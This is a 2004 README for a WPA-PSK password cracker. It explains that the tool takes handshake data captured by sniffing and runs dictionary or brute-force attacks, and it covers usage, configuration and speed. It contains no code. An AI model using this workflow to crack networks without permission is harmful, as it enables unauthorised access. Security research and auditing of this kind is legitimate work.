WPA Cracker
=============================================

WPA Cracker was developed by Takehiro Takahashi

version 0.1 - public release
Oct 27, 2004

Email: mailto:gte360y@mail.gatech.edu?Subject=WPA_CRACKER
WWW: http://www.tinypeap.com

Disclaimer
---------
This code was intended to point out the vulnerability which resides
within one of the WPA specification. 
Hence, it is purely educational and the auther does not take any 
responsibilities for whatever the damage this software may have caused.


What is WPA Cracker
------------------
WPA Cracker is a dictionary/brute-force attacker against WiFi Protected Access (WPA).
WPA takes two forms; WPA Enterprise Mode and WPA PSK (Pre-Shared Key) Mode.
WPA Cracker takes advantage of an inherently vulnerable characteristics of the 
PSK implementation to provide users an insight that the security must be 
deployed properly.

Requirements
------------
User must prepare traffic dumps required for the password calculation.
WPA Cracker takes ssid, anonce, snonce, host mac addess, ap mac address, 
and traffic dump from second step of a 4way-handshake as inputs to initiate the attack.
All the information stated above can be obtained through traffic sniffing 
using tools like Ethereal. Essentially, the first two packets of the 4way 
handshake are needed to collect the required information. The specific calculation
process of the password can be studied through the whitepaper found online.

Usage
-----
$./wpa_attack

WPA Cracker uses Password Cracking Library (PCL) written by Pavel Semjanov.
Hence, the behavior of WPA Cracker (brute-forcing or dictionary attacking)
can be determined by modifying the definition file; password.def.
The syntax of the definition file is very straight forward and it
can be studied through the comments in the file.
Refer to sample.txt for sample inputs.

Performance
-----------
Test Environment: Pentium M 1400Mhz, 1024MB RAM
Brute-Foring: 18 passphrases / 1 sec
Dictionary Attacking: 16 passphrases / 1 sec

The author realizes the poor performance of the cracker.  :p
This is due to the fact that the protocol requires thousands of hashing of 
the inputs (which is good). However, given a relatively simple passphrase,
the cracker will do its job in a reasonable amount of time. 
